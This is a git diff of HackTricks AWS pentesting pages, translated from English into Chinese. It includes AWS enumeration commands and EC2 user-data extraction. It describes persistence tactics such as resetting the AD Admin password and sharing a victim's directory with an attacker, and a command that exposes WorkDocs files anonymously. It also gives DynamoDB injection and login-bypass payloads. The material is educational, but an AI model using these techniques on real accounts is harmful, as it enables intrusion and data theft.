aws codepipeline get-pipeline-state --name ``` - ### Privesc -In the following page you can check how to **abuse codepipeline permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用codepipeline权限以提升特权**: {{#ref}} ../aws-privilege-escalation/aws-codepipeline-privesc.md @@ -58,12 +54,11 @@ In the following page you can check how to **abuse codepipeline permissions to e ## CodeCommit -It is a **version control service**, which is hosted and fully managed by Amazon, which can be used to privately store data (documents, binary files, source code) and manage them in the cloud. +它是一个**版本控制服务**,由亚马逊托管和完全管理,可用于私密存储数据(文档、二进制文件、源代码)并在云中管理它们。 -It **eliminates** the requirement for the user to know Git and **manage their own source control system** or worry about scaling up or down their infrastructure. Codecommit supports all the standard **functionalities that can be found in Git**, which means it works effortlessly with user’s current Git-based tools. +它**消除了**用户需要了解Git和**管理自己的源控制系统**或担心扩展或缩减其基础设施的要求。Codecommit支持所有标准的**功能,这些功能可以在Git中找到**,这意味着它与用户当前的基于Git的工具无缝协作。 ### Enumeration - ```bash # Repos aws codecommit list-repositories @@ -95,13 +90,8 @@ ssh-keygen -f .ssh/id_rsa -l -E md5 # Clone repo git clone ssh://@git-codecommit..amazonaws.com/v1/repos/ ``` - -## References +## 参考文献 - [https://docs.aws.amazon.com/whitepapers/latest/aws-overview/analytics.html](https://docs.aws.amazon.com/whitepapers/latest/aws-overview/analytics.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md index 93992174c..16d47f043 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md @@ -1,29 +1,28 @@ -# AWS - Directory Services / WorkDocs Enum +# AWS - 目录服务 / WorkDocs 枚举 {{#include ../../../banners/hacktricks-training.md}} -## Directory Services +## 目录服务 -AWS Directory Service for Microsoft Active Directory is a managed service that makes it easy to **set up, operate, and scale a directory** in the AWS Cloud. It is built on actual **Microsoft Active Directory** and integrates tightly with other AWS services, making it easy to manage your directory-aware workloads and AWS resources. With AWS Managed Microsoft AD, you can **use your existing** Active Directory users, groups, and policies to manage access to your AWS resources. This can help simplify your identity management and reduce the need for additional identity solutions. AWS Managed Microsoft AD also provides automatic backups and disaster recovery capabilities, helping to ensure the availability and durability of your directory. Overall, AWS Directory Service for Microsoft Active Directory can help you save time and resources by providing a managed, highly available, and scalable Active Directory service in the AWS Cloud. +AWS 目录服务为 Microsoft Active Directory 提供了一项托管服务,使您能够轻松地**在 AWS 云中设置、操作和扩展目录**。它基于实际的**Microsoft Active Directory**构建,并与其他 AWS 服务紧密集成,使您能够轻松管理目录感知的工作负载和 AWS 资源。使用 AWS 托管的 Microsoft AD,您可以**使用现有的** Active Directory 用户、组和策略来管理对 AWS 资源的访问。这可以帮助简化您的身份管理,并减少对额外身份解决方案的需求。AWS 托管的 Microsoft AD 还提供自动备份和灾难恢复功能,帮助确保您的目录的可用性和持久性。总体而言,AWS 目录服务为 Microsoft Active Directory 可以通过提供一个托管的、高可用的和可扩展的 Active Directory 服务来帮助您节省时间和资源。 -### Options +### 选项 -Directory Services allows to create 5 types of directories: +目录服务允许创建 5 种类型的目录: -- **AWS Managed Microsoft AD**: Which will run a new **Microsoft AD in AWS**. You will be able to set the admin password and access the DCs in a VPC. -- **Simple AD**: Which will be a **Linux-Samba** Active Directory–compatible server. You will be able to set the admin password and access the DCs in a VPC. -- **AD Connector**: A proxy for **redirecting directory requests to your existing Microsoft Active Directory** without caching any information in the cloud. It will be listening in a **VPC** and you need to give **credentials to access the existing AD**. -- **Amazon Cognito User Pools**: This is the same as Cognito User Pools. -- **Cloud Directory**: This is the **simplest** one. A **serverless** directory where you indicate the **schema** to use and are **billed according to the usage**. +- **AWS 托管 Microsoft AD**:将在 AWS 中运行一个新的**Microsoft AD**。您将能够设置管理员密码并访问 VPC 中的 DC。 +- **简单 AD**:将是一个**Linux-Samba** 兼容的 Active Directory 服务器。您将能够设置管理员密码并访问 VPC 中的 DC。 +- **AD 连接器**:一个代理,用于**将目录请求重定向到您现有的 Microsoft Active Directory**,而不在云中缓存任何信息。它将在**VPC**中监听,您需要提供**访问现有 AD 的凭据**。 +- **Amazon Cognito 用户池**:这与 Cognito 用户池相同。 +- **云目录**:这是**最简单**的一个。一个**无服务器**目录,您指明要使用的**模式**,并根据**使用情况计费**。 -AWS Directory services allows to **synchronise** with your existing **on-premises** Microsoft AD, **run your own one** in AWS or synchronize with **other directory types**. +AWS 目录服务允许与您现有的**本地** Microsoft AD**同步**,**在 AWS 中运行您自己的**,或与**其他目录类型**同步。 -### Lab +### 实验室 -Here you can find a nice tutorial to create you own Microsoft AD in AWS: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html) - -### Enumeration +在这里,您可以找到一个很好的教程,帮助您在 AWS 中创建自己的 Microsoft AD:[https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html) +### 枚举 ```bash # Get directories and DCs aws ds describe-directories @@ -36,10 +35,9 @@ aws ds get-directory-limits aws ds list-certificates --directory-id aws ds describe-certificate --directory-id --certificate-id ``` +### 登录 -### Login - -Note that if the **description** of the directory contained a **domain** in the field **`AccessUrl`** it's because a **user** can probably **login** with its **AD credentials** in some **AWS services:** +请注意,如果目录的**描述**字段中的**`AccessUrl`**包含**域**,则可能是因为**用户**可以使用其**AD凭据**在某些**AWS服务**中**登录**: - `.awsapps.com/connect` (Amazon Connect) - `.awsapps.com/workdocs` (Amazon WorkDocs) @@ -47,40 +45,39 @@ Note that if the **description** of the directory contained a **domain** in the - `.awsapps.com/console` (Amazon Management Console) - `.awsapps.com/start` (IAM Identity Center) -### Privilege Escalation +### 权限提升 {{#ref}} ../aws-privilege-escalation/aws-directory-services-privesc.md {{#endref}} -## Persistence +## 持久性 -### Using an AD user +### 使用AD用户 -An **AD user** can be given **access over the AWS management console** via a Role to assume. The **default username is Admin** and it's possible to **change its password** from AWS console. +可以通过角色赋予**AD用户**对**AWS管理控制台**的**访问权限**。**默认用户名是Admin**,可以从AWS控制台**更改其密码**。 -Therefore, it's possible to **change the password of Admin**, **create a new user** or **change the password** of a user and grant that user a Role to maintain access.\ -It's also possible to **add a user to a group inside AD** and **give that AD group access to a Role** (to make this persistence more stealth). +因此,可以**更改Admin的密码**,**创建新用户**或**更改用户的密码**并授予该用户一个角色以保持访问权限。\ +还可以**将用户添加到AD中的组**并**授予该AD组对角色的访问权限**(以使此持久性更加隐蔽)。 -### Sharing AD (from victim to attacker) +### 共享AD(从受害者到攻击者) -It's possible to share an AD environment from a victim to an attacker. This way the attacker will be able to continue accessing the AD env.\ -However, this implies sharing the managed AD and also creating an VPC peering connection. +可以将AD环境从受害者共享给攻击者。这样,攻击者将能够继续访问AD环境。\ +然而,这意味着要共享托管的AD并创建VPC对等连接。 -You can find a guide here: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html) +您可以在此找到指南:[https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html) -### ~~Sharing AD (from attacker to victim)~~ +### ~~共享AD(从攻击者到受害者)~~ -It doesn't look like possible to grant AWS access to users from a different AD env to one AWS account. +似乎不可能将AWS访问权限授予来自不同AD环境的用户到一个AWS账户。 ## WorkDocs -Amazon Web Services (AWS) WorkDocs is a cloud-based **file storage and sharing service**. It is part of the AWS suite of cloud computing services and is designed to provide a secure and scalable solution for organizations to store, share, and collaborate on files and documents. +Amazon Web Services (AWS) WorkDocs是一个基于云的**文件存储和共享服务**。它是AWS云计算服务套件的一部分,旨在为组织提供一个安全且可扩展的解决方案,以存储、共享和协作处理文件和文档。 -AWS WorkDocs provides a web-based interface for users to upload, access, and manage their files and documents. It also offers features such as version control, real-time collaboration, and integration with other AWS services and third-party tools. - -### Enumeration +AWS WorkDocs提供了一个基于Web的界面,供用户上传、访问和管理其文件和文档。它还提供版本控制、实时协作以及与其他AWS服务和第三方工具的集成等功能。 +### 枚举 ```bash # Get AD users (Admin not included) aws workdocs describe-users --organization-id @@ -109,7 +106,6 @@ aws workdocs describe-resource-permissions --resource-id aws workdocs add-resource-permissions --resource-id --principals Id=anonymous,Type=ANONYMOUS,Role=VIEWER ## This will give an id, the file will be acesible in: https://.awsapps.com/workdocs/index.html#/share/document/ ``` - ### Privesc {{#ref}} @@ -117,7 +113,3 @@ aws workdocs add-resource-permissions --resource-id --principals Id=anonymo {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md index caf35d03c..313dbc022 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md @@ -4,10 +4,9 @@ ## DocumentDB -Amazon DocumentDB, offering compatibility with MongoDB, is presented as a **fast, reliable, and fully managed database service**. Designed for simplicity in deployment, operation, and scalability, it allows the **seamless migration and operation of MongoDB-compatible databases in the cloud**. Users can leverage this service to execute their existing application code and utilize familiar drivers and tools, ensuring a smooth transition and operation akin to working with MongoDB. +亚马逊 DocumentDB,兼容 MongoDB,被呈现为一个 **快速、可靠且完全托管的数据库服务**。旨在简化部署、操作和可扩展性,它允许 **在云中无缝迁移和操作与 MongoDB 兼容的数据库**。用户可以利用此服务执行现有的应用程序代码,并使用熟悉的驱动程序和工具,确保平滑过渡和操作,类似于使用 MongoDB。 ### Enumeration - ```bash aws docdb describe-db-clusters # Get username from "MasterUsername", get also the endpoint from "Endpoint" aws docdb describe-db-instances #Get hostnames from here @@ -20,10 +19,9 @@ aws docdb describe-db-cluster-parameters --db-cluster-parameter-group-name ``` +### NoSQL 注入 -### NoSQL Injection - -As DocumentDB is a MongoDB compatible database, you can imagine it's also vulnerable to common NoSQL injection attacks: +由于 DocumentDB 是一个与 MongoDB 兼容的数据库,您可以想象它也容易受到常见的 NoSQL 注入攻击: {{#ref}} https://book.hacktricks.xyz/pentesting-web/nosql-injection @@ -35,12 +33,8 @@ https://book.hacktricks.xyz/pentesting-web/nosql-injection ../aws-unauthenticated-enum-access/aws-documentdb-enum.md {{#endref}} -## References +## 参考 - [https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/](https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md index cb0864715..f2187a0a1 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md @@ -4,30 +4,29 @@ ## DynamoDB -### Basic Information +### 基本信息 -Amazon DynamoDB is presented by AWS as a **fully managed, serverless, key-value NoSQL database**, tailored for powering high-performance applications regardless of their size. The service ensures robust features including inherent security measures, uninterrupted backups, automated replication across multiple regions, integrated in-memory caching, and convenient data export utilities. +Amazon DynamoDB 被 AWS 提供为一个 **完全托管的无服务器键值 NoSQL 数据库**,旨在支持高性能应用程序,无论其规模如何。该服务确保了强大的功能,包括固有的安全措施、不间断的备份、跨多个区域的自动复制、集成的内存缓存和方便的数据导出工具。 -In the context of DynamoDB, instead of establishing a traditional database, **tables are created**. Each table mandates the specification of a **partition key** as an integral component of the **table's primary key**. This partition key, essentially a **hash value**, plays a critical role in both the retrieval of items and the distribution of data across various hosts. This distribution is pivotal for maintaining both scalability and availability of the database. Additionally, there's an option to incorporate a **sort key** to further refine data organization. +在 DynamoDB 的上下文中,**创建的是表**,而不是建立传统数据库。每个表都要求指定一个 **分区键**,作为 **表主键** 的一个组成部分。这个分区键,实质上是一个 **哈希值**,在项目的检索和数据在不同主机之间的分配中起着关键作用。这种分配对于维护数据库的可扩展性和可用性至关重要。此外,还可以选择添加 **排序键** 以进一步细化数据组织。 -### Encryption +### 加密 -By default, DynamoDB uses a KMS key that \*\*belongs to Amazon DynamoDB,\*\*not even the AWS managed key that at least belongs to your account. +默认情况下,DynamoDB 使用一个 **属于 Amazon DynamoDB 的 KMS 密钥,** 甚至不是至少属于您账户的 AWS 管理密钥。
-### Backups & Export to S3 +### 备份与导出到 S3 -It's possible to **schedule** the generation of **table backups** or create them on **demand**. Moreover, it's also possible to enable **Point-in-time recovery (PITR) for a table.** Point-in-time recovery provides continuous **backups** of your DynamoDB data for **35 days** to help you protect against accidental write or delete operations. +可以 **安排** 生成 **表备份** 或按 **需** 创建它们。此外,还可以为表启用 **时间点恢复 (PITR)**。时间点恢复为您的 DynamoDB 数据提供连续的 **备份**,持续 **35 天**,以帮助您防止意外的写入或删除操作。 -It's also possible to export **the data of a table to S3**, but the table needs to have **PITR enabled**. +还可以将 **表的数据导出到 S3**,但该表需要启用 **PITR**。 ### GUI -There is a GUI for local Dynamo services like [DynamoDB Local](https://aws.amazon.com/blogs/aws/dynamodb-local-for-desktop-development/), [dynalite](https://github.com/mhart/dynalite), [localstack](https://github.com/localstack/localstack), etc, that could be useful: [https://github.com/aaronshaf/dynamodb-admin](https://github.com/aaronshaf/dynamodb-admin) - -### Enumeration +有一个用于本地 Dynamo 服务的 GUI,如 [DynamoDB Local](https://aws.amazon.com/blogs/aws/dynamodb-local-for-desktop-development/)、[dynalite](https://github.com/mhart/dynalite)、[localstack](https://github.com/localstack/localstack) 等,这些可能会很有用:[https://github.com/aaronshaf/dynamodb-admin](https://github.com/aaronshaf/dynamodb-admin) +### 枚举 ```bash # Tables aws dynamodb list-tables @@ -36,7 +35,7 @@ aws dynamodb describe-table --table-name #Get metadata info #Check if point in time recovery is enabled aws dynamodb describe-continuous-backups \ - --table-name tablename +--table-name tablename # Backups aws dynamodb list-backups @@ -54,129 +53,112 @@ aws dynamodb describe-export --export-arn # Misc aws dynamodb describe-endpoints #Dynamodb endpoints ``` - -### Unauthenticated Access +### 未经身份验证的访问 {{#ref}} ../aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md {{#endref}} -### Privesc +### 权限提升 {{#ref}} ../aws-privilege-escalation/aws-dynamodb-privesc.md {{#endref}} -### Post Exploitation +### 利用后 {{#ref}} ../aws-post-exploitation/aws-dynamodb-post-exploitation.md {{#endref}} -### Persistence +### 持久性 {{#ref}} ../aws-persistence/aws-dynamodb-persistence.md {{#endref}} -## DynamoDB Injection +## DynamoDB 注入 -### SQL Injection +### SQL 注入 -There are ways to access DynamoDB data with **SQL syntax**, therefore, typical **SQL injections are also possible**. +有方法可以使用 **SQL 语法** 访问 DynamoDB 数据,因此,典型的 **SQL 注入也是可能的**。 {{#ref}} https://book.hacktricks.xyz/pentesting-web/sql-injection {{#endref}} -### NoSQL Injection +### NoSQL 注入 -In DynamoDB different **conditions** can be used to retrieve data, like in a common NoSQL Injection if it's possible to **chain more conditions to retrieve** data you could obtain hidden data (or dump the whole table).\ -You can find here the conditions supported by DynamoDB: [https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html) +在 DynamoDB 中,可以使用不同的 **条件** 来检索数据,就像在常见的 NoSQL 注入中,如果可以 **链接更多条件以检索** 数据,您可能会获得隐藏数据(或转储整个表)。\ +您可以在这里找到 DynamoDB 支持的条件:[https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html) -Note that **different conditions** are supported if the data is being accessed via **`query`** or via **`scan`**. +请注意,如果通过 **`query`** 或 **`scan`** 访问数据,则支持 **不同的条件**。 > [!NOTE] -> Actually, **Query** actions need to specify the **condition "EQ" (equals)** in the **primary** key to works, making it much **less prone to NoSQL injections** (and also making the operation very limited). - -If you can **change the comparison** performed or add new ones, you could retrieve more data. +> 实际上,**Query** 操作需要在 **主** 键中指定 **条件 "EQ"(等于)** 才能工作,这使其 **更不容易受到 NoSQL 注入**(并且还使操作非常有限)。 +如果您可以 **更改比较** 或添加新的比较,您可以检索更多数据。 ```bash # Comparators to dump the database "NE": "a123" #Get everything that doesn't equal "a123" "NOT_CONTAINS": "a123" #What you think "GT": " " #All strings are greater than a space ``` - {{#ref}} https://book.hacktricks.xyz/pentesting-web/nosql-injection {{#endref}} -### Raw Json injection +### 原始 Json 注入 > [!CAUTION] -> **This vulnerability is based on dynamodb Scan Filter which is now deprecated!** +> **此漏洞基于现已弃用的 dynamodb 扫描过滤器!** -**DynamoDB** accepts **Json** objects to **search** for data inside the DB. If you find that you can write in the json object sent to search, you could make the DB dump, all the contents. - -For example, injecting in a request like: +**DynamoDB** 接受 **Json** 对象以 **搜索** 数据。如果您发现可以在发送的 json 对象中进行写入,您可以使数据库转储所有内容。 +例如,在请求中注入: ```bash '{"Id": {"ComparisonOperator": "EQ","AttributeValueList": [{"N": "' + user_input + '"}]}}' ``` - -an attacker could inject something like: +攻击者可以注入类似于: `1000"}],"ComparisonOperator": "GT","AttributeValueList": [{"N": "0` -fix the "EQ" condition searching for the ID 1000 and then looking for all the data with a Id string greater and 0, which is all. - -Another **vulnerable example using a login** could be: +修复“EQ”条件,搜索 ID 1000,然后查找所有 Id 字符串大于 0 的数据,即所有数据。 +另一个**使用登录的脆弱示例**可以是: ```python scan_filter = """{ - "username": { - "ComparisonOperator": "EQ", - "AttributeValueList": [{"S": "%s"}] - }, - "password": { - "ComparisonOperator": "EQ", - "AttributeValueList": [{"S": "%s"}] - } +"username": { +"ComparisonOperator": "EQ", +"AttributeValueList": [{"S": "%s"}] +}, +"password": { +"ComparisonOperator": "EQ", +"AttributeValueList": [{"S": "%s"}] +} } """ % (user_data['username'], user_data['password']) dynamodb.scan(TableName="table-name", ScanFilter=json.loads(scan_filter)) ``` - -This would be vulnerable to: - +这将容易受到以下攻击: ``` username: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none password: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none ``` - ### :property Injection -Some SDKs allows to use a string indicating the filtering to be performed like: - +某些 SDK 允许使用一个字符串来指示要执行的过滤,例如: ```java new ScanSpec().withProjectionExpression("UserName").withFilterExpression(user_input+" = :username and Password = :password").withValueMap(valueMap) ``` +您需要知道,在DynamoDB中搜索以**替换**属性**值**在**过滤表达式**中扫描项目时,令牌应**以**`:`**字符开头。这样的令牌将在运行时**替换**为实际的**属性值**。 -You need to know that searching in DynamoDB for **substituting** an attribute **value** in **filter expressions** while scanning the items, the tokens should **begin** with the **`:`** character. Such tokens will be **replaced** with actual **attribute value at runtime**. - -Therefore, a login like the previous one can be bypassed with something like: - +因此,像之前的登录可以通过以下方式绕过: ```bash :username = :username or :username # This will generate the query: # :username = :username or :username = :username and Password = :password # which is always true ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md index f365bc7f5..0281b5423 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md @@ -4,7 +4,7 @@ ## VPC & Networking -Learn what a VPC is and about its components in: +了解什么是 VPC 及其组件: {{#ref}} aws-vpc-and-networking-basic-information.md @@ -12,37 +12,36 @@ aws-vpc-and-networking-basic-information.md ## EC2 -Amazon EC2 is utilized for initiating **virtual servers**. It allows for the configuration of **security** and **networking** and the management of **storage**. The flexibility of Amazon EC2 is evident in its ability to scale resources both upwards and downwards, effectively adapting to varying requirement changes or surges in popularity. This feature diminishes the necessity for precise traffic predictions. +Amazon EC2 用于启动 **虚拟服务器**。它允许配置 **安全性** 和 **网络**,以及管理 **存储**。Amazon EC2 的灵活性体现在其能够向上和向下扩展资源,有效适应不同的需求变化或流行度激增。这一特性减少了对精确流量预测的必要性。 -Interesting things to enumerate in EC2: +在 EC2 中有趣的枚举内容: -- Virtual Machines - - SSH Keys - - User Data - - Existing EC2s/AMIs/Snapshots -- Networking - - Networks - - Subnetworks - - Public IPs - - Open ports -- Integrated connections with other networks outside AWS +- 虚拟机 +- SSH 密钥 +- 用户数据 +- 现有的 EC2/AMI/快照 +- 网络 +- 网络 +- 子网络 +- 公共 IP +- 开放端口 +- 与 AWS 之外的其他网络的集成连接 -### Instance Profiles +### 实例配置文件 -Using **roles** to grant permissions to applications that run on **EC2 instances** requires a bit of extra configuration. An application running on an EC2 instance is abstracted from AWS by the virtualized operating system. Because of this extra separation, you need an additional step to assign an AWS role and its associated permissions to an EC2 instance and make them available to its applications. +使用 **角色** 授予在 **EC2 实例** 上运行的应用程序权限需要额外的配置。运行在 EC2 实例上的应用程序通过虚拟化操作系统与 AWS 隔离。因此,您需要额外的步骤将 AWS 角色及其相关权限分配给 EC2 实例,并使其对应用程序可用。 -This extra step is the **creation of an** [_**instance profile**_](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html) attached to the instance. The **instance profile contains the role and** can provide the role's temporary credentials to an application that runs on the instance. Those temporary credentials can then be used in the application's API calls to access resources and to limit access to only those resources that the role specifies. Note that **only one role can be assigned to an EC2 instance** at a time, and all applications on the instance share the same role and permissions. +这一步骤是 **创建一个** [_**实例配置文件**_](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html) 附加到实例。**实例配置文件包含角色,并且**可以向在实例上运行的应用程序提供角色的临时凭证。这些临时凭证可以在应用程序的 API 调用中使用,以访问资源,并限制访问仅限于角色指定的那些资源。请注意,**一次只能将一个角色分配给 EC2 实例**,并且实例上的所有应用程序共享相同的角色和权限。 -### Metadata Endpoint +### 元数据端点 -AWS EC2 metadata is information about an Amazon Elastic Compute Cloud (EC2) instance that is available to the instance at runtime. This metadata is used to provide information about the instance, such as its instance ID, the availability zone it is running in, the IAM role associated with the instance, and the instance's hostname. +AWS EC2 元数据是关于 Amazon Elastic Compute Cloud (EC2) 实例的信息,在运行时可供实例使用。这些元数据用于提供有关实例的信息,例如其实例 ID、它运行的可用区、与实例关联的 IAM 角色以及实例的主机名。 {{#ref}} https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf {{#endref}} -### Enumeration - +### 枚举 ```bash # Get EC2 instances aws ec2 describe-instances @@ -50,10 +49,10 @@ aws ec2 describe-instance-status #Get status from running instances # Get user data from each ec2 instance for instanceid in $(aws ec2 describe-instances --profile --region us-west-2 | grep -Eo '"i-[a-zA-Z0-9]+' | tr -d '"'); do - echo "Instance ID: $instanceid" - aws ec2 describe-instance-attribute --profile --region us-west-2 --instance-id "$instanceid" --attribute userData | jq ".UserData.Value" | tr -d '"' | base64 -d - echo "" - echo "-------------------" +echo "Instance ID: $instanceid" +aws ec2 describe-instance-attribute --profile --region us-west-2 --instance-id "$instanceid" --attribute userData | jq ".UserData.Value" | tr -d '"' | base64 -d +echo "" +echo "-------------------" done # Instance profiles @@ -128,22 +127,21 @@ aws ec2 describe-route-tables aws ec2 describe-vpcs aws ec2 describe-vpc-peering-connections ``` - -### Unauthenticated Access +### 未经身份验证的访问 {{#ref}} ../../aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md {{#endref}} -### Privesc +### 权限提升 -In the following page you can check how to **abuse EC2 permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用EC2权限以提升权限**: {{#ref}} ../../aws-privilege-escalation/aws-ec2-privesc.md {{#endref}} -### Post-Exploitation +### 后期利用 {{#ref}} ../../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/ @@ -151,17 +149,17 @@ In the following page you can check how to **abuse EC2 permissions to escalate p ## EBS -Amazon **EBS** (Elastic Block Store) **snapshots** are basically static **backups** of AWS EBS volumes. In other words, they are **copies** of the **disks** attached to an **EC2** Instance at a specific point in time. EBS snapshots can be copied across regions and accounts, or even downloaded and run locally. +亚马逊**EBS**(弹性块存储)**快照**基本上是AWS EBS卷的静态**备份**。换句话说,它们是特定时间点上附加到**EC2**实例的**磁盘**的**副本**。EBS快照可以跨区域和账户复制,甚至可以下载并在本地运行。 -Snapshots can contain **sensitive information** such as **source code or APi keys**, therefore, if you have the chance, it's recommended to check it. +快照可能包含**敏感信息**,例如**源代码或API密钥**,因此,如果有机会,建议检查它。 -### Difference AMI & EBS +### AMI与EBS的区别 -An **AMI** is used to **launch an EC2 instance**, while an EC2 **Snapshot** is used to **backup and recover data stored on an EBS volume**. While an EC2 Snapshot can be used to create a new AMI, it is not the same thing as an AMI, and it does not include information about the operating system, application server, or other software required to run an application. +**AMI**用于**启动EC2实例**,而EC2**快照**用于**备份和恢复存储在EBS卷上的数据**。虽然EC2快照可以用于创建新的AMI,但它与AMI并不相同,并且不包含运行应用程序所需的操作系统、应用服务器或其他软件的信息。 -### Privesc +### 权限提升 -In the following page you can check how to **abuse EBS permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用EBS权限以提升权限**: {{#ref}} ../../aws-privilege-escalation/aws-ebs-privesc.md @@ -169,14 +167,13 @@ In the following page you can check how to **abuse EBS permissions to escalate p ## SSM -**Amazon Simple Systems Manager (SSM)** allows to remotely manage floats of EC2 instances to make their administrations much more easy. Each of these instances need to be running the **SSM Agent service as the service will be the one getting the actions and performing them** from the AWS API. +**亚马逊简单系统管理器(SSM)**允许远程管理EC2实例的浮动,使其管理变得更加简单。这些实例中的每一个都需要运行**SSM代理服务,因为该服务将负责从AWS API获取并执行操作**。 -**SSM Agent** makes it possible for Systems Manager to update, manage, and configure these resources. The agent **processes requests from the Systems Manager service in the AWS Cloud**, and then runs them as specified in the request. +**SSM代理**使系统管理器能够更新、管理和配置这些资源。代理**处理来自AWS云中系统管理器服务的请求**,然后按请求中指定的方式运行它们。 -The **SSM Agent comes**[ **preinstalled in some AMIs**](https://docs.aws.amazon.com/systems-manager/latest/userguide/ami-preinstalled-agent.html) or you need to [**manually install them**](https://docs.aws.amazon.com/systems-manager/latest/userguide/sysman-manual-agent-install.html) on the instances. Also, the IAM Role used inside the instance needs to have the policy **AmazonEC2RoleforSSM** attached to be able to communicate. - -### Enumeration +**SSM代理**[**在某些AMI中预安装**](https://docs.aws.amazon.com/systems-manager/latest/userguide/ami-preinstalled-agent.html),或者您需要在实例上[**手动安装它们**](https://docs.aws.amazon.com/systems-manager/latest/userguide/sysman-manual-agent-install.html)。此外,实例中使用的IAM角色需要附加**AmazonEC2RoleforSSM**策略才能进行通信。 +### 枚举 ```bash aws ssm describe-instance-information aws ssm describe-parameters @@ -185,16 +182,13 @@ aws ssm describe-instance-patches --instance-id aws ssm describe-instance-patch-states --instance-ids aws ssm describe-instance-associations-status --instance-id ``` - -You can check in an EC2 instance if Systems Manager is runnign just by executing: - +您可以通过执行以下命令检查 EC2 实例中是否正在运行 Systems Manager: ```bash ps aux | grep amazon-ssm ``` - ### Privesc -In the following page you can check how to **abuse SSM permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用SSM权限以提升权限**: {{#ref}} ../../aws-privilege-escalation/aws-ssm-privesc.md @@ -202,10 +196,9 @@ In the following page you can check how to **abuse SSM permissions to escalate p ## ELB -**Elastic Load Balancing** (ELB) is a **load-balancing service for Amazon Web Services** (AWS) deployments. ELB automatically **distributes incoming application traffic** and scales resources to meet traffic demands. +**弹性负载均衡**(ELB)是**亚马逊网络服务**(AWS)部署的**负载均衡服务**。ELB自动**分配传入的应用程序流量**并根据流量需求扩展资源。 ### Enumeration - ```bash # List internet-facing ELBs aws elb describe-load-balancers @@ -216,11 +209,9 @@ aws elbv2 describe-load-balancers aws elbv2 describe-load-balancers | jq '.LoadBalancers[].DNSName' aws elbv2 describe-listeners --load-balancer-arn ``` +## 启动模板与自动扩展组 -## Launch Templates & Autoscaling Groups - -### Enumeration - +### 枚举 ```bash # Launch templates aws ec2 describe-launch-templates @@ -235,12 +226,11 @@ aws autoscaling describe-launch-configurations aws autoscaling describe-load-balancer-target-groups aws autoscaling describe-load-balancers ``` - ## Nitro -AWS Nitro is a suite of **innovative technologies** that form the underlying platform for AWS EC2 instances. Introduced by Amazon to **enhance security, performance, and reliability**, Nitro leverages custom **hardware components and a lightweight hypervisor**. It abstracts much of the traditional virtualization functionality to dedicated hardware and software, **minimizing the attack surface** and improving resource efficiency. By offloading virtualization functions, Nitro allows EC2 instances to deliver **near bare-metal performance**, making it particularly beneficial for resource-intensive applications. Additionally, the Nitro Security Chip specifically ensures the **security of the hardware and firmware**, further solidifying its robust architecture. +AWS Nitro 是一套 **创新技术**,构成了 AWS EC2 实例的基础平台。由亚马逊推出以 **增强安全性、性能和可靠性**,Nitro 利用定制的 **硬件组件和轻量级虚拟机监控器**。它将传统虚拟化功能的大部分抽象到专用硬件和软件中,**最小化攻击面**并提高资源效率。通过卸载虚拟化功能,Nitro 使 EC2 实例能够提供 **接近裸金属的性能**,这对资源密集型应用特别有利。此外,Nitro 安全芯片专门确保 